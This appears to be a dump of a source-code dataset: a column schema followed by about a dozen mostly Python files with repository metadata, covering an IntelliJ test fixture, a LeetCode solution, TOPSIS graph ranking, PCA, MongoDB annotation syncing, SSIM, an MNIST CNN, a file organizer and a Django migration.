blob_id
stringlengths
40
40
directory_id
stringlengths
40
40
path
stringlengths
2
616
content_id
stringlengths
40
40
detected_licenses
listlengths
0
69
license_type
stringclasses
2 values
repo_name
stringlengths
5
118
snapshot_id
stringlengths
40
40
revision_id
stringlengths
40
40
branch_name
stringlengths
4
63
visit_date
timestamp[us]
revision_date
timestamp[us]
committer_date
timestamp[us]
github_id
int64
2.91k
686M
star_events_count
int64
0
209k
fork_events_count
int64
0
110k
gha_license_id
stringclasses
23 values
gha_event_created_at
timestamp[us]
gha_created_at
timestamp[us]
gha_language
stringclasses
220 values
src_encoding
stringclasses
30 values
language
stringclasses
1 value
is_vendor
bool
2 classes
is_generated
bool
2 classes
length_bytes
int64
2
10.3M
extension
stringclasses
257 values
content
stringlengths
2
10.3M
authors
listlengths
1
1
author_id
stringlengths
0
212
3425b8c8ddf35688b63bf676318fca670772fb43
eb9f655206c43c12b497c667ba56a0d358b6bc3a
/python/testData/intentions/PyInvertIfConditionIntentionTest/generalElse_after.py
bacc624e28d8fa6434622dc25954bb227f670b97
[ "Apache-2.0" ]
permissive
JetBrains/intellij-community
2ed226e200ecc17c037dcddd4a006de56cd43941
05dbd4575d01a213f3f4d69aa4968473f2536142
refs/heads/master
2023-09-03T17:06:37.560889
2023-09-03T11:51:00
2023-09-03T12:12:27
2,489,216
16,288
6,635
Apache-2.0
2023-09-12T07:41:58
2011-09-30T13:33:05
null
UTF-8
Python
false
false
119
py
def func(): value = "not-none" if value is not None: print("Not none") else: print("None")
[ "intellij-monorepo-bot-no-reply@jetbrains.com" ]
intellij-monorepo-bot-no-reply@jetbrains.com
f4983221e3c040489f717f6791c1ed4a21e5aee6
80e7fabb18a540b59bef95f01b37dce6dc88b2b4
/Simple_Problems/Q1007_Minimum_Domino_Rotations_For_Equal_Row .py
052ae13d0a5f4d39426a558e5e7a9ccd33d2fee7
[]
no_license
sktzwhj/algorithms
d8fce1fd12e0f46aa0417e0f998892c2273f7950
4b51e66a98931d174ee636969dee30cf0f397b00
refs/heads/master
2021-06-05T17:27:49.383709
2020-01-09T09:05:07
2020-01-09T09:05:07
102,172,473
0
0
null
null
null
null
UTF-8
Python
false
false
785
py
from collections import defaultdict import numpy as np class Solution(object): def minDominoRotations(self, A, B): """ :type A: List[int] :type B: List[int] :rtype: int """ if len(A) != len(B): return -1 current_set = set([A[0], B[0]]) for i in range(1, len(A)): try: for val in current_set: if val != A[i] and val != B[i]: current_set.remove(val) if len(current_set) == 0: return -1 except: continue step = len(A) for val in current_set: step = min(step, min(len(A) - A.count(val), len(A) - B.count(val))) return step
[ "whj_nudt@foxmail.com" ]
whj_nudt@foxmail.com
3df86635d5cca4a8f8b3258f926bf6370229d819
779b53e90f975350747ed59086c4f0dddbe43883
/Importance.py
50e191c997f55a33b81e120c341ba39f985e0f4f
[]
no_license
Iorizy2/first
8f680977790ecd0201214bb13bd8183b4f26ee40
2002bda011f24c10e0721a10ec10abf34aa6ca28
refs/heads/master
2021-07-24T03:04:36.026640
2017-11-02T14:44:39
2017-11-02T14:44:39
105,010,056
0
0
null
null
null
null
UTF-8
Python
false
false
1,567
py
from igraph import * from math import * from time import * #g = Graph() start=clock() g = Graph.GRG(200,0.1) summary(g) n=g.vcount() m=4 x=[[0]*m for i in range(n)] temp=g.evcent() #决策矩阵p for i in range(n): x[i][0]=g.degree(i) x[i][1]=temp[i] x[i][2]=g.closeness(i) x[i][3]=g.betweenness(i) #print(x) #规范化 maxarr= [] for j in range(m): max = 0 for i in range(n): if (x[i][j] > max): max = x[i][j] maxarr.append(max) #print(maxarr) #规范化决策矩阵 for i in range(n): for j in range(m): if(maxarr[j]==0): x[i][j]=0 else: x[i][j]=x[i][j]/maxarr[j] print("R:") print(x) w=[0.0861,0.2073,0.2073,0.4993] #加权规范化决策矩阵 y=[[0]*m for i in range(n)] for i in range(n): for j in range(m): y[i][j]=w[j]*x[i][j] print("Y:") print(y) a1=[] a2=[] #正负理想决策方案 for j in range(m): max = 0 min= 100 for i in range(n): if (y[i][j] > max): max = y[i][j] if(y[i][j]<min): min = y[i][j] a1.append(max) a2.append(min) #print(a1) #print(a2) #距离 d1=[] d2=[] for i in range(n): sum1=0 sum2=0 for j in range(m): sum1 += (y[i][j]-a1[j])*(y[i][j]-a1[j]) sum2 += (y[i][j] - a2[j]) * (y[i][j] - a2[j]) d1.append(sqrt(sum1)) d2.append(sqrt(sum2)) #print("d1 d2:") #print(d1) #print(d2) z=[] for i in range(n): #print(d2[i]) z.append(d2[i]/(d1[i]+d2[i])) print("z:") print(z) end=clock() print('Running time: %s Seconds'%(end-start))
[ "32098112+Iorizy2@users.noreply.github.com" ]
32098112+Iorizy2@users.noreply.github.com
f898fb937ae86ac19f7f7cd8f0c5689afb6c7897
81dce1d4687c0591c944037e78a1c119c57868b9
/PCA_scratch.py
dc7737d5fd0acb84bccb2bac51585c94239d0302
[]
no_license
RichardChangCA/Python-OpenCV-Practice
b7c0ea0abc50446612a7b6716c480b6fddc104c1
3db6323b814bcbcb6c01f14af0cf0c0370855e81
refs/heads/master
2021-07-20T20:48:35.570871
2020-05-24T23:31:01
2020-05-24T23:31:01
172,720,013
0
0
null
null
null
null
UTF-8
Python
false
false
1,172
py
# from : https://towardsdatascience.com/pca-explained-and-implemented-in-2-minutes-e024c832bb9cs from sklearn.datasets import load_iris import pandas as pd import numpy as np data =load_iris() X,y,column_names = data['data'],data['target'],data['feature_names'] X =pd.DataFrame(X,columns=column_names) # centering and scaling each column X = (X - X.mean(axis=0)) / X.std(axis=0) X.head() print(f'Original data shape:{X.shape}') C =X.values.T @ X.values print(f'Covariance matrix shape:{C.shape}\n\n') print(C) # find eigenvectors and eigenvalues of the covariance matrix from numpy.linalg import eig eigen_values, eigen_vectors = eig(C) # printing eigenvalue and its' corresponding eigenvector for index, eig_value in enumerate(eigen_values): print(eig_value, eigen_vectors[index]) # find 2 eigenvectors with the largest eigenvalues k = 2 projection_matrix = eigen_vectors[eigen_values.argsort()[::-1][:k]] print(projection_matrix.shape) print(projection_matrix) #projecting x_reduced = X @ projection_matrix.T print(x_reduced.shape) print(x_reduced.head()) import matplotlib.pyplot as plt plt.scatter(x_reduced.iloc[:, 0], x_reduced.iloc[:, 1]) plt.show()
[ "zhanglingfeng@zhanglingfengdeMacBook-Pro.local" ]
zhanglingfeng@zhanglingfengdeMacBook-Pro.local
0460d410607c285a025d2fda3f1d5623d90f0788
e1ca17cf705095113928317cf52f9c33aa38ea04
/utility/quip_comp_continue.py
a239cd9105f89a704673d817048edcceb7a10362
[]
no_license
SBU-BMI/Composite-Dataset
29376eeb9e2b6055f5253c6dcbaa112da1d67dea
9564140ac2cbe5367c684de8aadd42415f8abdba
refs/heads/master
2021-01-16T00:35:48.050825
2018-10-10T14:50:00
2018-10-10T14:50:00
99,967,252
0
1
null
null
null
null
UTF-8
Python
false
false
8,193
py
from pymongo import MongoClient from shapely.geometry import LineString from shapely.geometry.polygon import LinearRing from shapely.geometry import Polygon from bson import json_util import numpy as np import time import pprint import json import csv import sys import os import shutil import concurrent.futures import subprocess import pipes if __name__ == '__main__': if len(sys.argv)<0: print "usage:python quip_comp_continue.py" exit(); #db_host="129.49.249.175"; db_host="quip3.bmi.stonybrook.edu"; db_port="27017"; client = MongoClient('mongodb://'+db_host+':'+db_port+'/'); #client2 = MongoClient('mongodb://'+db_host2+':'+db_port+'/'); db = client.quip; objects = db.objects; metadata = db.metadata; images = db.images; db2=client.quip_comp; objects2 = db2.objects; metadata2 = db2.metadata; images2 = db2.images; excluded_list=['joseph.balsamo','tahsin.kurc','tigerfan7495','joelhsaltz','tammy.diprima','siwen.statistics']; record_count=0; for image_record in images.find({},{"_id":0}): case_id=image_record["case_id"]; images_count=images2.find({"case_id":case_id}).count(); if (images_count == 0): #print case_id, images_count; composite_input_count=metadata.find({"image.case_id":case_id, "image.subject_id":case_id, "provenance.analysis_execution_id":{'$regex' : 'composite_input', '$options' : 'i'}}).count(); #print case_id, images_count,composite_input_count; if (composite_input_count >0): user_list =[]; user=""; for user_composite_input in metadata.find({"image.case_id":case_id, "provenance.analysis_execution_id":{'$regex':'_composite_input'}}, {"provenance.analysis_execution_id":1}): tmp=user_composite_input["provenance"]["analysis_execution_id"]; tmp_user =tmp.split('_')[0]; user_list.append(tmp_user); for exclued_user in excluded_list: if exclued_user in user_list: user_list.remove(exclued_user); user_count=len(user_list); if user_count >1: user = user_list[0];# get first user if ( case_id == "17033063"): user='lillian.pao'; elif ( case_id == "BC_056_0_1"): user='areeha.batool'; elif ( case_id == "BC_061_0_2"): user='lillian.pao'; elif ( case_id == "BC_065_0_2"): user='epshita.das'; elif ( case_id == "PC_227_2_1"): user='areeha.batool'; else:# assign first user user=user; elif user_count<1: user=""; else:#only one user user=user_list[0]; if (user_count > 0):#user is available #print case_id,user record_count+=1; execution_id=user +"_composite_input"; markup_count=objects.find({"provenance.image.case_id":case_id, "provenance.image.subject_id":case_id, "provenance.analysis.execution_id":execution_id}).count(); print case_id,user,images_count,composite_input_count,markup_count; exit(); """ for image_record in images.find({},{"_id":0}): case_id=image_record["case_id"]; images_count=images2.find({"case_id":case_id}).count(); if (images_count > 0): #print case_id, images_count; composite_input_count=metadata.find({"image.case_id":case_id, "image.subject_id":case_id, "provenance.analysis_execution_id":{'$regex' : 'composite_input', '$options' : 'i'}}).count(); #print case_id, images_count,composite_input_count; if (composite_input_count >0): user_list =[]; user=""; for user_composite_input in metadata.find({"image.case_id":case_id, "provenance.analysis_execution_id":{'$regex':'_composite_input'}}, {"provenance.analysis_execution_id":1}): tmp=user_composite_input["provenance"]["analysis_execution_id"]; tmp_user =tmp.split('_')[0]; user_list.append(tmp_user); for exclued_user in excluded_list: if exclued_user in user_list: user_list.remove(exclued_user); user_count=len(user_list); if user_count >1: user = user_list[0];# get first user if ( case_id == "17033063"): user='lillian.pao'; elif ( case_id == "BC_056_0_1"): user='areeha.batool'; elif ( case_id == "BC_061_0_2"): user='lillian.pao'; elif ( case_id == "BC_065_0_2"): user='epshita.das'; elif ( case_id == "PC_227_2_1"): user='areeha.batool'; else:# assign first user user=user; elif user_count<1: user=""; else:#only one user user=user_list[0]; if (user_count > 0):#user is available #print case_id,user record_count+=1; execution_id=user +"_composite_input"; markup_count=objects.find({"provenance.image.case_id":case_id, "provenance.image.subject_id":case_id, "provenance.analysis.execution_id":execution_id}).count(); markup_count2=objects2.find({"provenance.image.case_id":case_id, "provenance.image.subject_id":case_id, "provenance.analysis.execution_id":execution_id}).count(); if (markup_count != markup_count2): print case_id,user,images_count,composite_input_count,markup_count,markup_count2; exit(); """ """ print "============== syn images collection ====================" for item in process_list: case_id=item[0]; dest_images_count= images2.find({"case_id":case_id}).count(); if (dest_images_count ==0): for image_record in images.find({"case_id":case_id},{"_id":0}): images2.insert_one(image_record); print case_id; else: print str(case_id) +" is Not empty in quip3 server db quip_comp images collection"; exit(); """ """ print "============== syn metadata collection ====================" for item in process_list: case_id=item[0]; subject_id =case_id; #remove old records and update to current record metadata2.remove({"image.case_id":case_id}); for metadata_record in metadata.find({"image.case_id":case_id},{"_id":0}): metadata2.insert_one(metadata_record); exit(); """ """ print "============== syn human markup annotations ====================" for item in process_list: case_id=item[0]; subject_id =case_id; user=item[1]; execution_id=user +"_composite_input"; #remove old records in objects collection for annotation in objects.find({"provenance.image.case_id":case_id, "provenance.image.subject_id":subject_id, "provenance.analysis.execution_id": execution_id },{"_id":0}): objects2.insert_one(annotation); exit(); """
[ "noreply@github.com" ]
SBU-BMI.noreply@github.com
1eab0cdda2292b5f50d15e52a213d3dba64f4093
566bff6664705e19e4c12c8ca172b7fcfe7b10c9
/ssim.py
dcbe029ce5a2095e2715e00f50424ae56468150a
[]
no_license
aiff22/DPED
61a43cb2f76bea617af61e3d9ead00acf7ac430d
ebb01315238430f7c66eaaf84996fcb59877f97f
refs/heads/master
2022-01-03T07:22:27.023525
2021-12-17T13:59:15
2021-12-17T13:59:15
101,207,412
1,686
379
null
null
null
null
UTF-8
Python
false
false
2,641
py
import numpy as np from scipy import signal from scipy.ndimage.filters import convolve import tensorflow as tf def _FSpecialGauss(size, sigma): radius = size // 2 offset = 0.0 start, stop = -radius, radius + 1 if size % 2 == 0: offset = 0.5 stop -= 1 x, y = np.mgrid[offset + start:stop, offset + start:stop] g = np.exp(-((x**2 + y**2)/(2.0 * sigma**2))) return g / g.sum() def _SSIMForMultiScale(img1, img2, max_val=255, filter_size=11, filter_sigma=1.5, k1=0.01, k2=0.03): img1 = img1.astype(np.float64) img2 = img2.astype(np.float64) _, height, width, _ = img1.shape size = min(filter_size, height, width) sigma = size * filter_sigma / filter_size if filter_size else 0 if filter_size: window = np.reshape(_FSpecialGauss(size, sigma), (1, size, size, 1)) mu1 = signal.fftconvolve(img1, window, mode='valid') mu2 = signal.fftconvolve(img2, window, mode='valid') sigma11 = signal.fftconvolve(img1 * img1, window, mode='valid') sigma22 = signal.fftconvolve(img2 * img2, window, mode='valid') sigma12 = signal.fftconvolve(img1 * img2, window, mode='valid') else: mu1, mu2 = img1, img2 sigma11 = img1 * img1 sigma22 = img2 * img2 sigma12 = img1 * img2 mu11 = mu1 * mu1 mu22 = mu2 * mu2 mu12 = mu1 * mu2 sigma11 -= mu11 sigma22 -= mu22 sigma12 -= mu12 c1 = (k1 * max_val) ** 2 c2 = (k2 * max_val) ** 2 v1 = 2.0 * sigma12 + c2 v2 = sigma11 + sigma22 + c2 ssim = np.mean((((2.0 * mu12 + c1) * v1) / ((mu11 + mu22 + c1) * v2))) cs = np.mean(v1 / v2) return ssim, cs def MultiScaleSSIM(img1, img2, max_val=255, filter_size=11, filter_sigma=1.5, k1=0.01, k2=0.03, weights=None): weights = np.array(weights if weights else [0.0448, 0.2856, 0.3001, 0.2363, 0.1333]) levels = weights.size downsample_filter = np.ones((1, 2, 2, 1)) / 4.0 im1, im2 = [x.astype(np.float64) for x in [img1, img2]] mssim = np.array([]) mcs = np.array([]) for _ in range(levels): ssim, cs = _SSIMForMultiScale(im1, im2, max_val=max_val, filter_size=filter_size, filter_sigma=filter_sigma, k1=k1, k2=k2) mssim = np.append(mssim, ssim) mcs = np.append(mcs, cs) filtered = [convolve(im, downsample_filter, mode='reflect') for im in [im1, im2]] im1, im2 = [x[:, ::2, ::2, :] for x in filtered] return np.prod(mcs[0:levels-1] ** weights[0:levels-1]) * (mssim[levels-1] ** weights[levels-1])
[ "ihnatova@student.ethz.ch" ]
ihnatova@student.ethz.ch
770b15a463d30ac2b7055814d531a95f8ea92808
4b28e34e326afdf0de4866f5c7c33eae9a9a314b
/Practice/ConvolutionLayerMNISTwithPrettyTensor.py
fb1df714fa7640dd1803f1d3a184d730ad0e7e88
[ "Apache-2.0" ]
permissive
karan23gupta/Summer-Training-Project
ce1a45bc82c2189a8b477fd6416f74e0e1a37a0a
177b568588e1d6e911b3a53bdaa0cd7d5441c313
refs/heads/master
2021-09-06T03:01:43.741308
2018-02-01T21:20:18
2018-02-01T21:20:18
119,895,093
0
0
null
null
null
null
UTF-8
Python
false
false
4,402
py
import matplotlib.pyplot as plt import tensorflow as tf import numpy as np import time from datetime import timedelta import math import prettytensor as pt from tensorflow.examples.tutorials.mnist import input_data data = input_data.read_data_sets('data/MNIST/',one_hot=True) data.test.cls = np.argmax(data.test.labels,axis=1) img_size = 28 img_size_flat = img_size * img_size img_shape = (img_size,img_size) num_channels = 1 num_classes = 10 def plot_images(images,cls_true,cls_pred=None): assert len(images) == len(cls_true) == 9 fig, axes = plt.subplots(3,3) fig.subplots_adjust(hspace=0.3,wspace=0.3) for i, ax in enumerate(axes.flat): ax.imshow(images[i].reshape(img_shape),cmap='binary') if cls_pred is None: xlabel = "True: {0}".format(cls_true[i]) else: xlabel = "True: {0}, Pred: {1}".format(cls_true[i],cls_pred[i]) ax.set_xlabel(xlabel) ax.set_xticks([]) ax.set_yticks([]) plt.show() ''' images = data.test.images[0:9] cls_true = data.test.cls[0:9] plot_images(images=images,cls_true=cls_true) ''' x = tf.placeholder(tf.float32, shape=[None, img_size_flat],name='x') x_image = tf.reshape(x,[-1,img_size,img_size,num_channels]) x_pretty = pt.wrap(x_image) y_true = tf.placeholder(tf.float32,shape=[None,num_classes],name='y_true') y_true_cls = tf.argmax(y_true,dimension=1) with pt.defaults_scope(): y_pred,loss = x_pretty.\ conv2d(kernel=5,depth=16,activation_fn=tf.nn.relu,name='layer_conv1').\ max_pool(kernel=2,stride=2).\ conv2d(kernel=2,depth=36,activation_fn=tf.nn.relu,name='layer_conv2').\ max_pool(kernel=2,stride=2).\ flatten().\ fully_connected(size=128,activation_fn=tf.nn.relu,name='layer_fc1').\ softmax_classifier(num_classes=num_classes,labels=y_true) optimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(loss) y_pred_cls = tf.argmax(y_pred,dimension=1) correct_prediction =tf.equal(y_pred_cls,y_true_cls) accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32)) session = tf.Session() session.run(tf.global_variables_initializer()) train_batch_size = 64 total_iterations = 0 def optimize(num_iterations): global total_iterations start_time = time.time() for i in range(total_iterations, total_iterations + num_iterations): x_batch, y_true_batch = data.train.next_batch(train_batch_size) feed_dict_train = {x: x_batch, y_true: y_true_batch} session.run(optimizer, feed_dict=feed_dict_train) if i % 100 == 0: acc = session.run(accuracy, feed_dict=feed_dict_train) msg = "Optimization Iteration: {0:>6}, Training Accuracy: {1:>6.1%}" # Print it. print(msg.format(i + 1, acc)) total_iterations += num_iterations end_time = time.time() time_dif = end_time - start_time print("Time usage: " + str(timedelta(seconds=int(round(time_dif))))) def plot_example_errors(cls_pred, correct): incorrect = (correct == False) images = data.test.images[incorrect] cls_pred = cls_pred[incorrect] cls_true = data.test.cls[incorrect] plot_images(images=images[0:9], cls_true=cls_true[0:9], cls_pred=cls_pred[0:9]) # Split the test-set into smaller batches of this size. test_batch_size = 256 def print_test_accuracy(show_example_errors=False): num_test = len(data.test.images) cls_pred = np.zeros(shape=num_test, dtype=np.int) i = 0 while i < num_test: j = min(i + test_batch_size, num_test) images = data.test.images[i:j, :] labels = data.test.labels[i:j, :] feed_dict = {x: images, y_true: labels} cls_pred[i:j] = session.run(y_pred_cls, feed_dict=feed_dict) i = j cls_true = data.test.cls correct = (cls_true == cls_pred) correct_sum = correct.sum() acc = float(correct_sum) / num_test msg = "Accuracy on Test-Set: {0:.1%} ({1} / {2})" print(msg.format(acc, correct_sum, num_test)) if show_example_errors: print("Example errors:") plot_example_errors(cls_pred=cls_pred, correct=correct) optimize(num_iterations=10000) print_test_accuracy()
[ "karangupta12527@gmail.com" ]
karangupta12527@gmail.com
d02c61be8cdc05408782448bf94a37e26a143c5d
d8b74da63f9cc0e22240383b75bcaf8e0af674a4
/helpers/organizer.py
3afa4fff9be76400c00098d359aae5ff5f15eaf6
[]
no_license
ronan99/Organizer
e69098a3a4d3b5b0b7cb660410bbdeae03ccbf17
36cd5bdda7b3fb186b84c50579fa34f3c8cf163d
refs/heads/master
2023-09-05T22:03:05.908861
2021-11-20T08:38:07
2021-11-20T08:38:07
430,051,960
0
0
null
null
null
null
UTF-8
Python
false
false
949
py
import os, sys, time from pathlib import Path from .files import * import shutil from tqdm import tqdm # from .progress_bar import progressBar def organize_junk(dir): if(not os.path.isdir(dir)): return "Not a dir" i = 1 size = len(os.listdir(dir)) for entry in tqdm(os.scandir(dir)): time.sleep(1) # print("Position " + str(i) + " of " + str(size) + " files.\n\n") # print("----------------------------------------------------------------------------- \n \n") i+= 1 if entry.is_dir(): continue file_path = Path(entry) file_format = file_path.suffix.lower() if file_format in FILE_FORMATS: dir_to_save = dir + "\\" + FILE_FORMATS[file_format] if not os.path.isdir(dir_to_save): os.mkdir(dir_to_save) shutil.move(file_path , dir_to_save) return "Dir organized"
[ "ronan.lino99@gmail.com" ]
ronan.lino99@gmail.com
440a8ddacad94b5c6f4c06e7d203858eec3a6b1f
15feffbabf6d711c38a0eb7f446fa32fa0f8fa21
/home/migrations/0008_auto_20210407_0114.py
e6e6b9e76ab7d32d053378cc86b333b7829c6af4
[]
no_license
erdemaltu/Python-Django-RealEstateHomeBuyingAndSelling
0342526d4a3db4fde6efc2187bd024111c8ef699
110113d05fc3da9acdb43cc5227a398b2f988bc0
refs/heads/master
2023-05-31T10:28:56.861446
2021-07-02T09:21:16
2021-07-02T09:21:16
349,551,792
0
0
null
null
null
null
UTF-8
Python
false
false
452
py
# Generated by Django 3.1.7 on 2021-04-06 22:14 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('home', '0007_auto_20210407_0030'), ] operations = [ migrations.RemoveField( model_name='contactformmessage', name='address', ), migrations.RemoveField( model_name='contactformmessage', name='phone', ), ]
[ "e-altug@hotmail.com" ]
e-altug@hotmail.com
a84c23e3ac2bad71e6046024c8f1e3abff7d11b8
ab60e13be23cf2962d0a10e1c575129c38a2746c
/src/attentive/__init__.py
8b07e27a24591ea524f557bf2e26108b0d38652c
[]
no_license
sthysel/attentive
1d83132b6dade8538063f67f3f69aa8c75e4bd18
3d4e53ba20e854307b6bb154985bd652fa1c4432
refs/heads/master
2021-01-20T03:57:21.238610
2017-09-08T05:15:43
2017-09-08T05:15:43
89,612,110
3
0
null
null
null
null
UTF-8
Python
false
false
53
py
from .attentive import * from .quit import quitevent
[ "sthysel@gmail.com" ]
sthysel@gmail.com
0370d28584720feafadc26ca4dc8a0978612b07f
54e08f00d129c9d6e2cd06f42a90945778785ee1
/ThievesRecognition/knife_detection.py
549a7e05967d534957d726862611244dffc4a2d4
[ "MIT" ]
permissive
sergioalberto/DeepLearningLab
8fc3a27fcca31c6b8d2877f323c5e6c4babaf40a
ac4f176f5e94dadee4465e2334b361b70e1d4ddc
refs/heads/master
2023-06-24T04:17:10.690318
2022-07-11T16:34:21
2022-07-11T16:34:21
164,376,441
1
1
MIT
2023-06-14T22:28:34
2019-01-07T04:04:40
null
UTF-8
Python
false
false
7,756
py
import os, sys, datetime, random import skimage.draw import numpy as np import matplotlib.pyplot as plt from matplotlib import patches, lines from skimage.measure import find_contours from matplotlib.patches import Polygon # Root directory of the project ROOT_DIR = os.path.abspath(".") sys.path.append(ROOT_DIR) # To find local version of the library from mrcnn.config import Config from mrcnn import model as modellib, utils from mrcnn import visualize # Path to trained weights file COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5") KNIFE_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_knife_v1.h5") # Directory to save logs and model checkpoints, if not provided # through the command line argument --logs DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs") class InferenceConfig(Config): # Give the configuration a recognizable name NAME = "knife" # Number of classes (including background) NUM_CLASSES = 1 + 1 # Background + knife # Number of training steps per epoch STEPS_PER_EPOCH = 100 # Skip detections with < 90% confidence DETECTION_MIN_CONFIDENCE = 0.9 # Set batch size to 1 since we'll be running inference on # one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU GPU_COUNT = 1 IMAGES_PER_GPU = 1 def color_splash(image, mask): """Apply color splash effect. image: RGB image [height, width, 3] mask: instance segmentation mask [height, width, instance count] Returns result image. """ # Make a grayscale copy of the image. The grayscale copy still # has 3 RGB channels, though. gray = skimage.color.gray2rgb(skimage.color.rgb2gray(image)) * 255 # Copy color pixels from the original color image where mask is set if mask.shape[-1] > 0: # We're treating all instances as one, so collapse the mask into one layer mask = (np.sum(mask, -1, keepdims=True) >= 1) splash = np.where(mask, image, gray).astype(np.uint8) else: splash = gray.astype(np.uint8) return splash def get_ax(rows=1, cols=1, size=16): """Return a Matplotlib Axes array to be used in all visualizations in the notebook. Provide a central point to control graph sizes. Adjust the size attribute to control how big to render images """ _, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows)) return ax def set_mask_image(image, boxes, masks, class_ids, class_names, scores=None, title="", figsize=(16, 16), ax=None, show_mask=True, show_bbox=True, colors=None, captions=None): """ boxes: [num_instance, (y1, x1, y2, x2, class_id)] in image coordinates. masks: [height, width, num_instances] class_ids: [num_instances] class_names: list of class names of the dataset scores: (optional) confidence scores for each box title: (optional) Figure title show_mask, show_bbox: To show masks and bounding boxes or not figsize: (optional) the size of the image colors: (optional) An array or colors to use with each object captions: (optional) A list of strings to use as captions for each object """ # Number of instances N = boxes.shape[0] if not N: print("\n*** No instances to display *** \n") else: assert boxes.shape[0] == masks.shape[-1] == class_ids.shape[0] # If no axis is passed, create one and automatically call show() auto_show = False if not ax: _, ax = plt.subplots(1, figsize=figsize) auto_show = True # Generate random colors colors = colors or visualize.random_colors(N) # Show area outside image boundaries. height, width = image.shape[:2] ax.set_ylim(height + 10, -10) ax.set_xlim(-10, width + 10) ax.axis('off') ax.set_title(title) masked_image = image.astype(np.uint32).copy() for i in range(N): color = colors[i] # Bounding box if not np.any(boxes[i]): # Skip this instance. Has no bbox. Likely lost in image cropping. continue y1, x1, y2, x2 = boxes[i] if show_bbox: p = patches.Rectangle((x1, y1), x2 - x1, y2 - y1, linewidth=2, alpha=0.7, linestyle="dashed", edgecolor=color, facecolor='none') ax.add_patch(p) # Label if not captions: class_id = class_ids[i] score = scores[i] if scores is not None else None label = class_names[class_id] x = random.randint(x1, (x1 + x2) // 2) caption = "{} {:.3f}".format(label, score) if score else label else: caption = captions[i] ax.text(x1, y1 + 8, caption, color='w', size=11, backgroundcolor="none") # Mask mask = masks[:, :, i] if show_mask: masked_image = visualize.apply_mask(masked_image, mask, color) # Mask Polygon # Pad to ensure proper polygons for masks that touch image edges. padded_mask = np.zeros( (mask.shape[0] + 2, mask.shape[1] + 2), dtype=np.uint8) padded_mask[1:-1, 1:-1] = mask contours = find_contours(padded_mask, 0.5) for verts in contours: # Subtract the padding and flip (y, x) to (x, y) verts = np.fliplr(verts) - 1 p = Polygon(verts, facecolor="none", edgecolor=color) ax.add_patch(p) ax.imshow(masked_image.astype(np.uint8)) if auto_show: plt.show() return masked_image if __name__ == '__main__': import argparse # Parse command line arguments parser = argparse.ArgumentParser( description='Knife detection demo.') parser.add_argument('--model', required=True, metavar="/path/to/weights.h5", help="Path to weights .h5 file or 'coco'") parser.add_argument('--logs', required=False, default=DEFAULT_LOGS_DIR, metavar="/path/to/logs/", help='Logs and checkpoints directory (default=logs/)') parser.add_argument('--image', required=True, metavar="path or URL to image", help='Image to apply the color splash effect on') args = parser.parse_args() print("Model: ", args.model) print("Logs: ", args.logs) # Configurations config = InferenceConfig() config.display() # Create model model = modellib.MaskRCNN(mode="inference", config=config, model_dir=args.logs) # Select weights file to load weights_path = args.model # Load weights print("Loading weights ", weights_path) model.load_weights(weights_path, by_name=True) # Run model detection and generate the color splash effect print("Running on {}".format(args.image)) # Read image image = skimage.io.imread(args.image) # Detect objects r = model.detect([image], verbose=1)[0] # Color splash splash = color_splash(image, r['masks']) # Save output file_name = "splash_{:%Y%m%dT%H%M%S}.png".format(datetime.datetime.now()) print ("Saving splash image on {}".format(file_name)) skimage.io.imsave(file_name, splash) # Display results ax = get_ax(1) class_names = ['BG', 'knife'] mask_image = set_mask_image(image, r['rois'], r['masks'], r['class_ids'], class_names, r['scores'], ax=ax, title="Knife Predictions") # Save output file_name = "mask_{:%Y%m%dT%H%M%S}.png".format(datetime.datetime.now()) print ("Saving mask image on {}".format(file_name)) skimage.io.imsave(file_name, mask_image)
[ "sgonzalez@zenoss.com" ]
sgonzalez@zenoss.com
9da46f329f3952018d200a3e7eb9a6593d3e21ca
aa7fc244d220f218c799158ed4076628911a85f9
/TERCERO/PSI/upload/forms.py
7ff3081104c19e2115994732eb3077a7713c8469
[]
no_license
Juanllamazares/informatica-uam
4bba8f33ad2c9c358801d74d6cc394a2418a7f62
9292b3824d2b748033eb5ef73f918e13d9ff5fba
refs/heads/master
2022-12-23T13:38:42.543604
2020-09-17T15:37:40
2020-09-17T15:37:40
null
0
0
null
null
null
null
UTF-8
Python
false
false
637
py
from django import forms from data.models import WorkFlow, Category class UploadWorkflow(forms.ModelForm): name = forms.CharField(label = 'Name') category = forms.ModelMultipleChoiceField(label = 'Category', queryset = Category.objects.all(), required = False) keywords = forms.CharField(label = 'Keywords', max_length = 256) description = forms.CharField(label = 'Description', max_length = 512) versionInit = forms.CharField(label = 'Version', max_length = 128) json = forms.FileField(label = 'Upload JSON') class Meta: model = WorkFlow fields = ('name', 'keywords', 'description', 'category', 'versionInit', 'json',)
[ "tom3.hv23@gmail.com" ]
tom3.hv23@gmail.com
6eb5d6f21a0f8cb5ea2bf73c210ca1f46ca447bf
ce76b3ef70b885d7c354b6ddb8447d111548e0f1
/large_case.py
277a782fa6b80b12aba0b6d2cd3f37a72636cccd
[]
no_license
JingkaiTang/github-play
9bdca4115eee94a7b5e4ae9d3d6052514729ff21
51b550425a91a97480714fe9bc63cb5112f6f729
refs/heads/master
2021-01-20T20:18:21.249162
2016-08-19T07:20:12
2016-08-19T07:20:12
60,834,519
0
0
null
null
null
null
UTF-8
Python
false
false
232
py
#! /usr/bin/env python def problem_or_right_thing(str_arg): world(str_arg) print('number') def world(str_arg): print(str_arg) if __name__ == '__main__': problem_or_right_thing('see_same_problem_from_government')
[ "jingkaitang@gmail.com" ]
jingkaitang@gmail.com
7d8771b2852273169428bbe1116e9f713bf48d93
70f4171d3024d22de8686ffff5b4bfee9bffa4b0
/uri-online-judge/1051.py
2a36fa52704e0086ce3e77e864d5e93b4a47b732
[]
no_license
raquelsouto/python
1ea105a5a3844cf1827da10b4b74b8366cfed39c
dbafa504e83a20c8eb3ed453069b49d631a13d2c
refs/heads/master
2022-11-21T23:36:28.973184
2020-07-23T02:08:12
2020-07-23T02:10:01
281,823,427
0
0
null
null
null
null
UTF-8
Python
false
false
592
py
